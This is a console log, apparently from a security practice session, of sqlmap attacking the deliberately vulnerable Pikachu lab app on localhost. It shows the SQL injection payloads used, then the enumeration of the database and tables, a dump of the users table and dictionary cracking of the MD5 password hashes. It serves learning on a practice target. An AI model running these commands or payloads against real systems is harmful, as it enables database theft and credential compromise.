    Payload: name=125' UNION ALL SELECT NULL,CONCAT(0x7171707a71,0x6e74535565754e4e58524a52444861567151725044435a7a6f777673697a614661706a5755566f4e,0x717a6a6a71)#&submit=??????
---
[13:42:49] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23, PHP
back-end DBMS: MySQL >= 5.0
[13:42:49] [INFO] fetching current database
current database: 'pikachu'
[13:42:49] [INFO] fetched data logged to text files under 'C:\Users\admin\AppData\Local\sqlmap\output\localhost'

[*] ending @ 13:42:49 /2022-05-20/


D:\sqlmap>sqlmap.py -u "http://localhost/pikachu/vul/sqli/sqli_str.php?name=125&submit=%E6%9F%A5%E8%AF%A2#" -D pikachu --tables
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.6.5.5#dev}
|_ -| . [)]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:50:37 /2022-05-20/

[13:50:38] [INFO] resuming back-end DBMS 'mysql'
[13:50:38] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=qccjn3eov3m...f6nqusp7c1'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: name (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: name=125' RLIKE (SELECT (CASE WHEN (9692=9692) THEN 125 ELSE 0x28 END))-- Wxxo&submit=??????

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: name=125' AND (SELECT 4398 FROM(SELECT COUNT(*),CONCAT(0x7171707a71,(SELECT (ELT(4398=4398,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- UEfG&submit=??????

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: name=125' AND (SELECT 9681 FROM (SELECT(SLEEP(5)))aLvG)-- OQRc&submit=??????

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: name=125' UNION ALL SELECT NULL,CONCAT(0x7171707a71,0x6e74535565754e4e58524a52444861567151725044435a7a6f777673697a614661706a5755566f4e,0x717a6a6a71)#&submit=??????
---
[13:50:44] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23, PHP
back-end DBMS: MySQL >= 5.0
[13:50:44] [INFO] fetching tables for database: 'pikachu'
Database: pikachu
[5 tables]
+----------+
| member   |
| httpinfo |
| message  |
| users    |
| xssblind |
+----------+

[13:50:44] [INFO] fetched data logged to text files under 'C:\Users\admin\AppData\Local\sqlmap\output\localhost'

[*] ending @ 13:50:44 /2022-05-20/


D:\sqlmap>sqlmap.py -u "http://localhost/pikachu/vul/sqli/sqli_str.php?name=125&submit=%E6%9F%A5%E8%AF%A2#" -D pikachu -T users --columns
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.6.5.5#dev}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:54:36 /2022-05-20/

[13:54:37] [INFO] resuming back-end DBMS 'mysql'
[13:54:37] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=9859qoh85k5...7ri540s0k0'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: name (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: name=125' RLIKE (SELECT (CASE WHEN (9692=9692) THEN 125 ELSE 0x28 END))-- Wxxo&submit=??????

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: name=125' AND (SELECT 4398 FROM(SELECT COUNT(*),CONCAT(0x7171707a71,(SELECT (ELT(4398=4398,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- UEfG&submit=??????

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: name=125' AND (SELECT 9681 FROM (SELECT(SLEEP(5)))aLvG)-- OQRc&submit=??????

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: name=125' UNION ALL SELECT NULL,CONCAT(0x7171707a71,0x6e74535565754e4e58524a52444861567151725044435a7a6f777673697a614661706a5755566f4e,0x717a6a6a71)#&submit=??????
---
[13:54:39] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23, PHP
back-end DBMS: MySQL >= 5.0
[13:54:39] [INFO] fetching columns for table 'users' in database 'pikachu'
Database: pikachu
Table: users
[4 columns]
+----------+------------------+
| Column   | Type             |
+----------+------------------+
| level    | int(11)          |
| id       | int(10) unsigned |
| password | varchar(66)      |
| username | varchar(30)      |
+----------+------------------+

[13:54:40] [INFO] fetched data logged to text files under 'C:\Users\admin\AppData\Local\sqlmap\output\localhost'

[*] ending @ 13:54:40 /2022-05-20/


D:\sqlmap>sqlmap.py -u "http://localhost/pikachu/vul/sqli/sqli_str.php?name=125&submit=%E6%9F%A5%E8%AF%A2#" -D pikachu -T users -C users,password --dump
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.6.5.5#dev}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:57:20 /2022-05-20/

[13:57:21] [INFO] resuming back-end DBMS 'mysql'
[13:57:21] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=b7usjqq2c9c...i6etq5i2s1'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: name (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: name=125' RLIKE (SELECT (CASE WHEN (9692=9692) THEN 125 ELSE 0x28 END))-- Wxxo&submit=??????

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: name=125' AND (SELECT 4398 FROM(SELECT COUNT(*),CONCAT(0x7171707a71,(SELECT (ELT(4398=4398,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- UEfG&submit=??????

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: name=125' AND (SELECT 9681 FROM (SELECT(SLEEP(5)))aLvG)-- OQRc&submit=??????

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: name=125' UNION ALL SELECT NULL,CONCAT(0x7171707a71,0x6e74535565754e4e58524a52444861567151725044435a7a6f777673697a614661706a5755566f4e,0x717a6a6a71)#&submit=??????
---
[13:57:24] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23, PHP
back-end DBMS: MySQL >= 5.0
[13:57:24] [INFO] fetching entries of column(s) 'password,users' for table 'users' in database 'pikachu'
[13:57:26] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[13:57:27] [INFO] fetching number of column(s) 'password,users' entries for table 'users' in database 'pikachu'
[13:57:27] [INFO] resumed: 3
[13:57:27] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:57:27] [INFO] retrieved:
[13:57:28] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
[13:57:28] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

[13:57:28] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[13:57:28] [INFO] retrieved:
[13:57:28] [INFO] retrieved:
[13:57:28] [INFO] retrieved:
[13:57:28] [INFO] retrieved:
[13:57:28] [INFO] retrieved:
[13:57:28] [INFO] retrieved:
[13:57:28] [INFO] retrieved:
[13:57:28] [INFO] retrieved:
[13:57:29] [INFO] retrieved:
[13:57:29] [INFO] retrieved:
Database: pikachu
Table: users
[3 entries]
+---------+----------+
| users   | password |
+---------+----------+
| <blank> | <blank>  |
| <blank> | <blank>  |
| <blank> | <blank>  |
+---------+----------+

[13:57:29] [INFO] table 'pikachu.users' dumped to CSV file 'C:\Users\admin\AppData\Local\sqlmap\output\localhost\dump\pikachu\users.csv'
[13:57:29] [INFO] fetched data logged to text files under 'C:\Users\admin\AppData\Local\sqlmap\output\localhost'

[*] ending @ 13:57:29 /2022-05-20/


D:\sqlmap>sqlmap.py -u "http://localhost/pikachu/vul/sqli/sqli_str.php?name=125&submit=%E6%9F%A5%E8%AF%A2#" -D pikachu -T users -C username,password --dump
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.6.5.5#dev}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:59:23 /2022-05-20/

[13:59:23] [INFO] resuming back-end DBMS 'mysql'
[13:59:23] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=rrrfp8al293...3gebmr4k97'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: name (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: name=125' RLIKE (SELECT (CASE WHEN (9692=9692) THEN 125 ELSE 0x28 END))-- Wxxo&submit=??????

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: name=125' AND (SELECT 4398 FROM(SELECT COUNT(*),CONCAT(0x7171707a71,(SELECT (ELT(4398=4398,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- UEfG&submit=??????

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: name=125' AND (SELECT 9681 FROM (SELECT(SLEEP(5)))aLvG)-- OQRc&submit=??????

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: name=125' UNION ALL SELECT NULL,CONCAT(0x7171707a71,0x6e74535565754e4e58524a52444861567151725044435a7a6f777673697a614661706a5755566f4e,0x717a6a6a71)#&submit=??????
---
[13:59:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23, PHP
back-end DBMS: MySQL >= 5.0
[13:59:26] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'pikachu'
[13:59:26] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[13:59:29] [INFO] writing hashes to a temporary file 'c:\users\admin\appdata\local\temp\sqlmapllflqi10628\sqlmaphashes-deh_hd.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[13:59:35] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'D:\sqlmap\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>

[14:00:38] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[14:00:42] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[14:00:42] [INFO] starting 4 processes
[14:00:45] [INFO] cracked password '000000' for user 'pikachu'
][ [1I4:00:46NFO]] [ cracked password 'INFO123456] current status: 02633... |' for user 'admin'
[abc12314:00:50' for user '] [testINFO'
[14:01:38] [INFO] using suffix '1'
[14:02:36] [INFO] using suffix '123'
[14:03:03] [INFO] cracked password 'abc123' for user 'test'
Database: pikachu
Table: users
[3 entries]
+----------+-------------------------------------------+
| username | password                                  |
+----------+-------------------------------------------+
| admin    | e10adc3949ba59abbe56e057f20f883e (123456) |
| pikachu  | 670b14728ad9902aecba32e22fa4f6bd (000000) |
| test     | e99a18c428cb38d5f260853678922e03 (abc123) |
+----------+-------------------------------------------+

[14:03:03] [INFO] table 'pikachu.users' dumped to CSV file 'C:\Users\admin\AppData\Local\sqlmap\output\localhost\dump\pikachu\users.csv'
[14:03:03] [INFO] fetched data logged to text files under 'C:\Users\admin\AppData\Local\sqlmap\output\localhost'

[*] ending @ 14:03:03 /2022-05-20/


D:\sqlmap>
D:\sqlmap>

Logo

为开发者提供学习成长、分享交流、生态实践、资源工具等服务,帮助开发者快速成长。

更多推荐